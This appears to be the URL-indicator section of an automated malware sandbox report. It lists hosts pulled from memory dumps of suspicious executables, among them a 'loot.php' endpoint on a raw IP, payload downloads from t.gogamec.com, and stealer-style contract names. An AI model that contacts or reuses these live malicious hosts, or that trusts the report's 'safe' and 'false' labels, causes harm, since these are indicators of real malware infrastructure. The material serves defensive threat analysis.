Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown
URL: https://cdn.discorP
Source: Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation: unknown

URL: http://45.9.20.13/partner/loot.php?pub=mixone8
Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 6%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown
URL: http://tempuri.org/IContract/ExtensionNordVPNResponseH9
Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation: unknown

URL: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.43.dr, qmgr.db.43.dr
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown

URL: https://t.gogame.v
Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation: unknown

URL: https://curl.se/
Source: setup_install.exe
Malicious: false
Antivirus Detection:
  • 0%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown
URL: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown

URL: http://wfsdragon.ru/
Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 9%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown
URL: http://45.9.20.13/partner/loot.php?pub=mixone?
Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation: unknown

URL: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown

URL: https://t.gogamec.com:443/2302/sqlite.date.dat
Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: malware
Reputation: unknown
URL: https://niemannbest.me/?username=p11_2
Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 12%, Virustotal
  • Avira URL Cloud: malware
Reputation: unknown

URL: https://topniemannpickshop.cc
Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000248B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 14%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown

URL: https://niemannbest.me/?username=p11_1
Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 14%, Virustotal
  • Avira URL Cloud: malware
Reputation: unknown
URL: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Mon178817e243.exe, 00000016.00000002.4158008324.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown
                  http://tempuri.org/IContract/ConfirmResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal
                  • Avira URL Cloud: safe
                  unknown
                  https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.datMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002B.00000003.1818483646.000002804DAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/InitResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal
                  • Avira URL Cloud: safe
                  unknown
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139setup_install.exe, 00000002.00000002.1969543955.0000000002584000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 14%, Virustotal
                  • Avira URL Cloud: phishing
                  unknown
                  http://tempuri.org/IContract/ExtensionNordVPNMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal
                  • Avira URL Cloud: safe
                  unknown
                  https://wns.windows.com/Lexplorer.exe, 0000002F.00000002.4182753346.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/EnvironmentSettingsLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.meMon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://t.gogamec.com//yMon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_7Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://t.gogamec.com/2302/sqlit.~Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/ExtensionScannedFilesMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://staticimg.youtuuee.com/bzMon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://niemannbest.me/?username=p11_4Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_3Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_6Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/SetEnvironmentResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.me/?username=p11_5Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/ExtensionInstalledBrowsersResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.ver)svchost.exe, 0000002B.00000002.3465357200.000002804D88C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionScannedFilesResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
